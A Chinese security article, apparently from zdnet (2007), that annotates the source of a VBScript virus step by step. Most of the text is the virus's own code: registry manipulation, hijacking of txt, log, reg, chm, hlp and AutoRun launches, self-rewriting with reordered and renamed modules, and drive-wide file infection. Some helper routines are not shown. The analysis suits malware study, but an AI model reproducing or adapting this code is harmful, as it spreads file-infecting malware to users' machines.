按照我得到的样本中代码顺序分上中下剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的...
作者:论坛整理 来源:zdnet网络安全 2007年12月24日
关键字: 安全 病毒防范 病毒
照我得到的样本中代码顺序分上中下剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的...
//删除注册表键值函数
引用
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
//RegDelete 从注册表中删除指定的键或值
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
//读注册表键值函数
引用
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
//RegRead 从注册表中返回指定的键或值
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
//写注册表键值函数
引用
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
//RegWrite 在注册表中设置指定的键或值
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
//VBS病毒体程序
引用
Sub ExeVbs_Virus()
//除错代码,定义变量
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
//创建FSO对象,从而可以对文本文件和文件目录进行访问控制
Set objfso = CreateObject(GetFSOName())
//创建WshShell 对象,从而可以对注册表和进程进行访问控制
Set objshell = CreateObject("WScript.Shell")
//获取病毒体文件路径(WScript.ScriptFullName ’返回当前运行脚本的完整路径)
FullPath_Self = WScript.ScriptFullName
//获取病毒体文件名(WScript.ScriptName ’返回当前双击执行的WSF或VBS或JS文件的文件名)
Name_Self = WScript.ScriptName
//定义模块名称数组,下面用到
Names = Array("ATRWZPCAQPMYT", "SXHBAKUUEZF")
//获得脚本外界参数
Set oArgs = WScript.Arguments
ArgNum = 0
//WScript.Arguments.count ’返回用户所拖放文件至脚本时的拖放文件个数
//WScript.Echo WScript.Arguments(0) ’返回用户所拖放文件第1个单个文件的完整路径和名称
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
//获取参数后缀
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
//AutoRun启动
Case "run"
//获取驱动器名称
RunPath = Left(FullPath_Self, 2)
//打开驱动器
Call Run(RunPath)
// 获得全局变量vbsCode 得到自身病毒代码
vbsCode = GetSelfCode(objfso, FullPath_Self)
//生成病毒体代码架构
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
//更换病毒体模块顺序
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
//更换名称
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
//主程序文件检查
Call InvadeSystem(objfso, VbsCode_Virus)
//运行程序
Call Run(FullPath_V1)
//txt,log关联启动
Case "txt", "log"
//运行相关txt,log文件
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
//运行病毒文件
Call Run(FullPath_V1)
//reg关联启动
Case "reg"
//运行相关reg文件
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
//chm关联启动
Case "chm"
//运行相关chm文件
Para_V = "hh.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
//hlp关联启动
Case "hlp"
//运行相关hlp文件
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
//正常启动
Case Else
//如果病毒已在运行就退出
If PreInstance = True Then
WScript.Quit
End If
//如果可以感染
If IsOK(objfso, Date(), FullPath_Config) = False Then
//如果配置文件已经存在
If objfso.FileExists(FullPath_Config) = True Then
//获取Order名称
Order = Trim(ReadOK(objfso, FullPath_Config))
Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
End If
Select Case Order_Order
//如果命令名称是InfectFiles,则进行感染
Case "InfectFiles"
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Order_Para = Order_Para + Cnt
//超过2000个文件则改操作命令为msg,以及命令内容
If Order_Para>2000 Then
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
End If
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
//如果命令名称是msg,则弹出提示
Case "Msg"
MsgBox Order_Para
Call WriteOK(objfso, FullPath_Config, "", "")
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
//如果命令名称是UnLoadMe,则自我清楚恢复系统
Case "UnLoadMe"
Call RestoreSystem(objfso)
Wscript.Quit
//如果命令名称是KillVirus,则自我清楚恢复系统并且恢复被感染的文件
Case "KillVirus"
Call RestoreSystem(objfso)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
//如果是其他,则传播
Case Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
End Select
Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V ’生成病毒体完整代码
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) ’改变模块组合顺序
VbsCode_Virus = ChangeName(VbsCode_Virus, Names) ’改变模块标志名称
Call MonitorSystem(objfso, VbsCode_Virus)
End If
End Select
Set objfso = Nothing
Set objshell = Nothing
End Sub
//病毒开始,排错并定义
引用
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
Cnt = 0
//感染文件的最大数目
CntMax = 1000
//版本号
Version = "4"
//定义病毒文件名称
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 ’主要执行文件关联转向
FullPath_V1 = GetSFolder(1) & Name_V1 ’主要执行配置文件命令
//定义配置文件名称
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
Sum_ModelCode = 26
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
//定义模块头部与尾部名称
ModelHead="’ATRWZPCAQPMYT"
ModelTail="’SXHBAKUUEZF"